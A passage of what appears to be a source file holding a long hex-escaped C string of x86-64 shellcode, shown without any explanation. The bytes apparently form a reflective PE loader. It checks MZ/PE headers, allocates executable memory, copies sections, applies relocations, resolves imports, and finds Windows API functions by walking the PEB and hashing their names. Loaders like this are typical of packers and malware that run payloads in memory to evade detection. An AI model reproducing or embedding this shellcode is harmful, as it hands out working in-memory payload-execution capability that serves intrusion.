"\x48\x31\xDB\x8B\x1A\x48\x01\xDF\x48\x89\x7D\x08\x48\x89\xFA\x48\x83\xC2\x00\x8B\x1A\x81\xFB\x50\x45\x00\x00" 128 | "\x75\x3F\x48\x89\xFA\x48\x83\xC2\x18\x66\x8B\x1A\x66\x81\xFB\x0B\x02\x75\x2E\x48\x89\xFA\x48\x83\xC2\x14\x48" 129 | "\x31\xDB\x66\x8B\x1A\x48\x89\xFA\x48\x83\xC2\x18\x48\x01\xDA\x48\x89\x55\x10\x48\x89\xFA\x48\x81\xC2\x88\x00" 130 | "\x00\x00\x48\x89\x55\x18\x48\x31\xC0\xEB\x06\x48\x31\xC0\x48\xF7\xD0\x5B\x5A\x5F\xC3\x57\x52\x53\x48\x8B\x7D" 131 | "\x08\x48\x83\xC7\x50\x48\x31\xDB\x8B\x1F\x48\x89\x5D\x50\x48\x8B\x7D\x08\x48\x83\xC7\x30\x48\x8B\x17\x49\xB9" 132 | "\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30\x00\x00\x00\x00\x00\x00\x48\x89\xD1\x48\x89\xDA\x48\x83\xEC" 133 | "\x20\xFF\x56\x08\x48\x83\xC4\x20\x48\x85\xC0\x75\x25\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30" 134 | "\x00\x00\x00\x00\x00\x00\x48\x89\xDA\x48\x31\xC9\x48\x83\xEC\x20\xFF\x56\x08\x48\x83\xC4\x20\x5B\x5A\x5F\xC3" 135 | "\x57\x52\x53\x51\x56\x48\x8B\x76\x48\x48\x8B\x7D\x20\x48\x8B\x5D\x08\x48\x83\xC3\x54\x48\x31\xC9\x8B\x0B\xF3" 136 | "\xA4\x5E\x48\x8B\x7D\x08\x48\x83\xC7\x06\x48\x31\xDB\x66\x8B\x1F\x48\x31\xD2\x48\x39\xD3\x74\x4D\x48\xB8\x28" 137 | "\x00\x00\x00\x00\x00\x00\x00\x52\x48\xF7\xE2\x5A\x48\x03\x45\x10\x56\x48\x8B\x76\x48\x48\x89\xC1\x48\x83\xC1" 138 | "\x14\x4D\x31\xD2\x44\x8B\x11\x4C\x01\xD6\x48\x8B\x7D\x20\x48\x89\xC1\x48\x83\xC1\x0C\x4D\x31\xD2\x44\x8B\x11" 139 | "\x4C\x01\xD7\x48\x83\xC0\x10\x48\x31\xC9\x8B\x08\xF3\xA4\x5E\x48\xFF\xC2\xEB\xAE\x48\x31\xC0\xEB\x06\x48\x31" 140 | "\xC0\x48\xF7\xD0\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x48\x8B\x7D\x20\xE8\x6C\xFE\xFF\xFF\x48\x85\xC0\x0F\x85" 141 | "\x50\x01\x00\x00\xE8\x1F\x05\x00\x00\x48\x85\xC0\x0F\x85\x42\x01\x00\x00\x48\x8B\x7D\x00\x48\xB8\x08\x00\x00" 142 | "\x00\x00\x00\x00\x00\x48\xBA\x01\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xE2\x48\x8B\x55\x18\x48\x01\xC2\x48\x83" 143 | "\xC2\x00\x48\x31\xDB\x8B\x1A\x48\x01\xFB\x48\x89\x5D\x30\x48\x39\xFB\x0F\x84\x0F\x01\x00\x00\x49\x89\xDA\x49" 144 | "\x83\xC2\x10\x48\x31\xC0\x41\x8B\x02\x48\x85\xC0\x0F\x84\xF9\x00\x00\x00\x48\x8B\x45\x00\x48\x89\xDA\x48\x83" 145 | "\xC2\x0C\x4D\x31\xD2\x44\x8B\x12\x4C\x01\xD0\x48\x89\xC1\x48\x83\xEC\x20\xFF\x56\x18\x48\x83\xC4\x20\x48\x85" 146 | "\xC0\x0F\x84\xC6\x00\x00\x00\x48\x89\x45\x48\x48\x89\xDA\x48\x83\xC2\x00\x48\x8B\x7D\x00\x4D\x31\xD2\x44\x8B" 147 | "\x12\x4C\x01\xD7\x48\x89\x7D\x38\x48\x89\xDA\x48\x83\xC2\x10\x48\x8B\x7D\x00\x4D\x31\xD2\x44\x8B\x12\x4C\x01" 148 | "\xD7\x48\x89\x7D\x40\x48\x8B\x55\x38\x48\x8B\x12\x48\x85\xD2\x74\x7D\x48\x89\xD7\x49\xBA\x00\x00\x00\x00\x00" 149 | "\x00\x00\x80\x4C\x21\xD7\x74\x0C\x48\x89\xD7\x48\x81\xE7\xFF\xFF\x00\x00\xEB\x0B\x48\x8B\x7D\x00\x48\x01\xD7" 150 | "\x48\x83\xC7\x02\x48\x89\xFA\x48\x8B\x4D\x48\x48\x83\xEC\x20\xFF\x56\x20\x48\x83\xC4\x20\x48\x85\xC0\x74\x46" 151 | "\x48\x8B\x55\x40\x48\x89\x02\xE8\x07\x06\x00\x00\x48\x85\xC0\x74\x0F\xE8\x97\x05\x00\x00\x48\x85\xC0\x75\x05" 152 | "\xE8\xF0\x04\x00\x00\x48\x8B\x55\x38\x48\x83\xC2\x08\x48\x89\x55\x38\x48\x8B\x55\x40\x48\x83\xC2\x08\x48\x89" 153 | "\x55\x40\xE9\x77\xFF\xFF\xFF\x48\x83\xC3\x14\xE9\xF9\xFE\xFF\xFF\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0" 154 | "\x59\x5B\x5A\x5F\xC3\x57\x52\x48\x8B\x7D\x08\x48\x83\xC7\x30\x48\x8B\x55\x20\x48\x89\x17\x48\x31\xC0\x5A\x5F" 155 | "\xC3\x57\x52\x53\x51\x48\x8B\x55\x28\x48\x85\xD2\x0F\x84\xF5\x00\x00\x00\x48\xB8\x08\x00\x00\x00\x00\x00\x00" 156 | "\x00\x48\xBA\x05\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xE2\x48\x8B\x55\x18\x48\x01\xC2\x49\x89\xD2\x49\x83\xC2" 157 | "\x04\x48\x31\xFF\x41\x8B\x3A\x48\x85\xFF\x0F\x84\xC1\x00\x00\x00\x49\x89\xD2\x49\x83\xC2\x00\x48\x31\xFF\x41" 158 | "\x8B\x3A\x48\x85\xFF\x0F\x84\xA3\x00\x00\x00\x48\x8B\x55\x20\x48\x01\xFA\x49\x89\xD2\x49\x83\xC2\x04\x41\x8B" 159 | "\x3A\x48\x85\xFF\x0F\x84\x91\x00\x00\x00\x48\x83\xEF\x08\x48\xD1\xEF\x48\x31\xC9\x48\x39\xF9\x74\x65\x48\x89" 160 | "\xD3\x48\x83\xC3\x08\x48\x89\xC8\x48\xD1\xE0\x48\x01\xC3\x48\xC7\x45\x58\x00\x00\x00\x00\x66\x8B\x03\x66\x25" 161 | "\x00\xF0\x66\xC1\xE8\x0C\x66\x83\xF8\x00\x74\x37\x66\x83\xF8\x03\x74\x06\x66\x83\xF8\x0A\x75\x2B\x49\x89\xD2" 162 | "\x49\x83\xC2\x00\x41\x8B\x02\x48\x89\x45\x58\x48\x31\xC0\x66\x8B\x03\x66\x25\xFF\x0F\x48\x01\x45\x58\x48\x8B" 163 | "\x45\x20\x48\x03\x45\x58\x48\x8B\x5D\x28\x48\x01\x18\x48\xFF\xC1\xEB\x96\x49\x89\xD2\x49\x83\xC2\x04\x48\x31" 164 | "\xFF\x41\x8B\x3A\x48\x01\xFA\xE9\x64\xFF\xFF\xFF\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0\x59\x5B\x5A\x5F" 165 | "\xC3\x57\x52\x53\x51\x48\xB8\x08\x00\x00\x00\x00\x00\x00\x00\x48\xBA\x03\x00\x00\x00\x00\x00\x00\x00\x48\xF7" 166 | "\xE2\x48\x8B\x55\x18\x48\x01\xC2\x48\x89\xD1\x48\x83\xC1\x04\x48\x31\xC0\x8B\x01\x48\x85\xC0\x74\x36\x48\x89" 167 | "\xD1\x48\x83\xC1\x00\x48\x31\xFF\x8B\x39\x48\x85\xFF\x74\x25\x48\x8B\x4D\x20\x49\x89\xC8\x48\x01\xF9\x48\x89" 168 | "\x4D\x78\x48\x31\xD2\xBF\x0C\x00\x00\x00\xF7\xF7\x89\xC2\x48\x83\xEC\x20\xFF\x56\x38\x48\x83\xC4\x20\x48\x31" 169 | "\xC0\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x48\x8B\x7D\x08\x48\x83\xC7\x06\x48\x31\xDB\x66\x8B\x1F\x48\x31\xD2" 170 | "\x48\x39\xD3\x0F\x84\xE6\x00\x00\x00\x48\xB8\x28\x00\x00\x00\x00\x00\x00\x00\x52\x48\xF7\xE2\x5A\x48\x03\x45" 171 | "\x10\x49\x89\xC2\x49\x83\xC2\x24\x48\x31\xFF\x41\x8B\x3A\xC7\x85\xA6\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xC7" 172 | "\x00\x00\x00\x02\x0F\x85\x9F\x00\x00\x00\x48\xF7\xC7\x00\x00\x00\x40\x74\x0A\xC7\x85\xA6\x00\x00\x00\x02\x00" 173 | "\x00\x00\x49\xBA\x00\x00\x00\x80\x00\x00\x00\x00\x4C\x85\xD7\x74\x0A\xC7\x85\xA6\x00\x00\x00\x04\x00\x00\x00" 174 | "\x48\xF7\xC7\x00\x00\x00\x20\x74\x26\x83\xBD\xA6\x00\x00\x00\x02\x75\x0A\xC7\x85\xA6\x00\x00\x00\x20\x00\x00" 175 | "\x00\x83\xBD\xA6\x00\x00\x00\x04\x75\x0A\xC7\x85\xA6\x00\x00\x00\x40\x00\x00\x00\x48\x8B\x7D\x20\x48\x89\xC1" 176 | "\x48\x83\xC1\x0C\x4D\x31\xD2\x44\x8B\x11\x4C\x01\xD7\x49\x89\xC2\x49\x83\xC2\x08\x41\x8B\x0A\x52\x4C\x8D\x8D" 177 | "\xAA\x00\x00\x00\x4C\x8B\x85\xA6\x00\x00\x00\x48\x89\xCA\x48\x89\xF9\x48\x83\xEC\x20\xFF\x56\x30\x48\x83\xC4" 178 | "\x20\x5A\x48\x85\xC0\x74\x08\x48\xFF\xC2\xE9\x19\xFF\xFF\xFF\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0\x59" 179 | "\x5B\x5A\x5F\xC3\x52\x57\x48\xBA\x00\x00\x00\x00\x00\x00\x00\x00\xEB\x0C\x52\x57\x48\xBA\x01\x00\x00\x00\x00" 180 | "\x00\x00\x00\x48\x8B\x45\x20\x4C\x8B\x55\x08\x49\x83\xC2\x28\x48\x31\xFF\x41\x8B\x3A\x48\x01\xF8\x49\xB8\x00" 181 | "\x00\x00\x00\x00\x00\x00\x00\x48\x8B\x4D\x20\x48\x83\xEC\x20\xFF\xD0\x48\x83\xC4\x20\x48\x31\xC0\x5F\x5A\xC3" 182 | "\x48\x39\xEC\x0F\x8D\xAA\x00\x00\x00\x57\x56\x53\x48\x89\xE6\x48\x83\xC6\x0C\x55\x6A\x00\x48\x89\xE3\x51\x52" 183 | "\x48\x89\xE9\x48\x29\xF1\x48\x83\xF9\x08\x0F\x8C\x81\x00\x00\x00\x50\x52\x53\x48\xB8\x0F\x00\x00\x00\x00\x00" 184 | "\x00\x00\x48\x6B\xC0\x08\x48\x39\xC8\x7D\x03\x48\x89\xC1\x48\xBA\x00\x00\x00\x00\x00\x00\x00\x00\x48\x89\xC8" 185 | "\x48\xBB\x08\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xFB\x48\xFF\xC8\x6A\x00\x48\x83\xF8\x00\x75\xF5\x48\x01\xCC" 186 | "\x5B\x5A\x58\x48\x89\xE5\x48\x89\xE7\x48\x29\xCF\x48\x89\xFC\xF3\xA4\x48\x89\x23\x48\x8B\x4B\xF8\x48\x8B\x53" 187 | "\xF0\x48\xC7\x43\xF8\x00\x00\x00\x00\x48\xC7\x43\xF0\x00\x00\x00\x00\x48\xC7\x04\x24\xFF\xFF\xFF\xFF\x48\xBE" 188 | "\xEE\xEE\xEE\xEE\xEE\xEE\xEE\xEE\xFF\xE0\x59\x59\x5D\x5D\x5B\x5E\x5F\xFF\xE0\x48\x89\xE1\x48\x2B\x4D\x08\x48" 189 | "\x83\xE9\x04\x48\x89\xEC\x48\x83\xC4\x0C\x5D\x5B\x5E\x5F\x5A\x48\x01\xCC\xFF\xE2\x00\x00\x00\x00\x57\x52\x53" 190 | "\x51\x48\xB8\x08\x00\x00\x00\x00\x00\x00\x00\x48\xBA\x0C\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xE2\x48\x8B\x55" 191 | "\x18\x48\x01\xC2\x48\x83\xC2\x04\x48\x31\xDB\x8B\x1A\x48\xC1\xEB\x02\x48\xB8\x0F\x00\x00\x00\x00\x00\x00\x00" 192 | "\x48\xF7\xE3\x48\x89\x45\x68\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30\x00\x00\x00\x00\x00\x00" 193 | "\x48\x89\xC2\x48\x31\xC9\x48\x83\xEC\x20\xFF\x56\x08\x48\x83\xC4\x20\x48\x85\xC0\x74\x7C\x48\x89\x45\x60\x48" 194 | "\x8B\x46\x58\x48\x8B\xBD\xAE\x00\x00\x00\x48\x83\xC7\x03\x48\x89\x07\x48\x8B\x46\x68\x48\xA9\x00\x00\x00\x00" 195 | "\x74\x2E\x48\x8B\x85\xBE\x00\x00\x00\x48\x8B\x9D\xC6\x00\x00\x00\x48\x89\x03\x48\x8B\x5E\x60\x48\x8B\xBD\xC6" 196 | "\x00\x00\x00\x48\x29\xDF\x48\x8B\x9D\xB6\x00\x00\x00\x48\xFF\xC3\x48\x89\x3B\xEB\x14\x48\x8B\x85\xBE\x00\x00" 197 | "\x00\x48\x8B\xBD\xB6\x00\x00\x00\x48\xFF\xC7\x48\x89\x07\x48\x8B\x46\x68\x48\xA9\x01\x00\x00\x00\x74\x14\x48" 198 | "\x8B\xBD\xB6\x00\x00\x00\xC6\x07\xBF\xEB\x08\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0\x59\x5B\x5A\x5F\xC3" 199 | "\x57\x52\x53\x51\x56\x50\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48\x01\xC7\x48\x89\xEE\x48\x81\xC6\x80\x00\x00\x00" 200 | "\x48\xB9\x0F\x00\x00\x00\x00\x00\x00\x00\xF3\xA4\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48\x01\xC7\x48\x83\xC7\x00" 201 | "\x48\xFF\xC7\x48\x8B\x55\x40\x48\x8B\x1A\x48\x89\x1F\x48\x8B\xB5\xCE\x00\x00\x00\x48\x8B\x7D\x60\x48\x8B\x45" 202 | "\x70\x48\x01\xC7\x48\x83\xC7\x0A\x48\xFF\xC7\x48\x83\xC7\x08\x48\x29\xFE\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48" 203 | "\x01\xC7\x48\x83\xC7\x0A\x48\xFF\xC7\x48\x89\x37\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48\x01\xC7\x48\x8B\x75\x40" 204 | "\x48\x89\x3E\x48\x8B\x45\x70\x48\x83\xC0\x0F\x48\x89\x45\x70\x58\x5E\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x56" 205 | "\xEB\x4D\x48\x8B\x7D\x00\x48\x89\xDA\x48\x83\xC2\x0C\x48\x03\x3A\x48\x89\xE9\x48\x81\xC1\x8F\x00\x00\x00\x48" 206 | "\x89\xFA\x48\x83\xEC\x20\xFF\x56\x28\x48\x83\xC4\x20\x48\x85\xC0\x74\x22\x48\x89\xE9\x48\x81\xC1\x9A\x00\x00" 207 | "\x00\x48\x89\xFA\x48\x83\xEC\x20\xFF\x56\x28\x48\x83\xC4\x20\x48\x85\xC0\x74\x05\x48\x31\xC0\xEB\x0C\x48\xB8" 208 | "\x01\x00\x00\x00\x00\x00\x00\x00\xEB\x00\x5E\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x56\x48\x8B\x7D\x48\x48\x89" 209 | "\xFA\x48\x83\xC2\x00\x66\x8B\x1A\x66\x81\xFB\x4D\x5A\x0F\x85\x9B\x00\x00\x00\x48\x89\xFA\x48\x83\xC2\x3C\x48" 210 | "\x31\xDB\x8B\x1A\x48\x01\xDF\x48\x89\xFA\x48\x83\xC2\x00\x48\x31\xDB\x8B\x1A\x48\x81\xFB\x50\x45\x00\x00\x75" 211 | "\x77\x48\x89\xFE\x48\x83\xC6\x14\x48\x31\xDB\x66\x8B\x1E\x48\x89\xFE\x48\x83\xC6\x18\x48\x01\xDE\x48\x89\xFB" 212 | "\x48\x83\xC3\x06\x48\x31\xC9\x66\x8B\x0B\x48\x31\xD2\x48\x89\xF3\x48\x83\xC3\x0C\x48\x8B\x7D\x48\x4D\x31\xD2" 213 | "\x44\x8B\x13\x4C\x01\xD7\x48\x39\xF8\x7C\x2B\x48\x89\xF3\x48\x83\xC3\x08\x4D\x31\xD2\x44\x8B\x13\x4C\x01\xD7" 214 | "\x48\x39\xF8\x7D\x16\x49\x89\xF2\x49\x83\xC2\x24\x48\x31\xDB\x41\x8B\x1A\x48\xF7\xC3\x00\x00\x00\x20\x75\x11" 215 | "\x48\x83\xC6\x28\x48\xFF\xC2\x48\x39\xCA\x7C\xB0\x48\x31\xC0\xEB\x0C\x48\xB8\x01\x00\x00\x00\x00\x00\x00\x00" 216 | "\xEB\x00\x5E\x59\x5B\x5A\x5F\xC3\xEB\x4D\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 217 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x00\x00\x00\x21\x0D\x00\x00\x4E\x0D\x00\x00\x00\x09" 218 | "\x00\x00\x00\x5E\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x58\x48\x8B\x60\xC6\x48\x8B" 219 | "\x68\xCE\x48\x8B\x70\xD6\x48\x8D\x0D\xCA\xFF\xFF\xFF\x48\x83\xEC\x20\xFF\x56\x40\x48\x83\xC4\x20\xE9\x11\x01" 220 | "\x00\x00\x4C\x89\xC6\xE9\x09\x01\x00\x00\x54\x55\x51\x52\x53\x56\x57\x48\x31\xDB\x65\x48\x8B\x5B\x30\x48\x8B" 221 | "\x5B\x60\x48\x8B\x5B\x18\x48\x8B\x5B\x10\x48\x8B\x73\x60\x48\x85\xF6\x0F\x84\xA6\x00\x00\x00\x48\x8B\x6B\x30" 222 | "\x48\x85\xED\x0F\x84\x99\x00\x00\x00\x48\x31\xD2\xC1\xC2\x05\x66\xAD\x0C\x20\x30\xC2\x66\x83\x3E\x00\x75\xF1" 223 | "\x48\x8B\x1B\x48\x3B\x54\x24\x20\x75\xCA\x48\x89\xEF\x66\x81\x3F\x4D\x5A\x75\x73\x8B\x7D\x3C\x48\x01\xEF\x81" 224 | "\x3F\x50\x45\x00\x00\x75\x65\x48\x89\xF9\x48\x83\xC1\x18\x48\x85\xC9\x74\x59\x48\x31\xD2\x8B\xBF\x88\x00\x00" 225 | "\x00\x48\x01\xEF\x8B\x57\x1C\x48\x01\xEA\x8B\x5F\x20\x48\x01\xEB\x8B\x7F\x24\x48\x01\xEF\x49\x89\xD1\x8B\x33" 226 | "\x48\x01\xEE\x48\x31\xD2\xC1\xC2\x05\xAC\x0C\x20\x30\xC2\x80\x3E\x00\x75\xF3\x48\x3B\x54\x24\x18\x74\x0C\x48" 227 | "\x83\xC7\x02\x48\x83\xC3\x04\xE2\xDA\xEB\x10\x48\x0F\xB7\x17\x48\xC1\xE2\x02\x4C\x01\xCA\x8B\x02\x48\x01\xE8" 228 | "\x5F\x5E\x5B\x5A\x59\x5D\x5C\xC3\x06\xDF\xB0\x2C\x51\x33\x8A\x8D\xA4\x00\x78\x95\x27\x85\x00\x3B\x00\xA1\xB4" 229 | "\x00\xDB\xB6\xB6\xE5\x00\xC4\x22\x07\xE2\x00\x82\x5A\x15\x4A\x00\x02\x55\xF0\xD6\xDE\x79\x03\xAA\x86\x00\x0D" 230 | "\xC4\x8A\xDC\x00\x00\x48\x8B\x26\x50\x48\x31\xC0\x48\x8D\x0D\x33\x00\x00\x00\x48\x8D\x1D\x2C\x00\x00\x00\x48" 231 | "\x29\xD9\x48\x89\xDF\xF3\xAA\x48\x8D\x0D\x0D\x00\x00\x00\x48\x8D\x1D\x96\xF0\xFF\xFF\x48\x29\xD9\x48\x89\xDF" 232 | "\xF3\xAA\x58\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5E\x5F\x5D\x5B\xC3\xEB\x08\x00\x14\x00\x00\x01\x00\x00\x00"; 233 | 234 | --------------------------------------------------------------------------------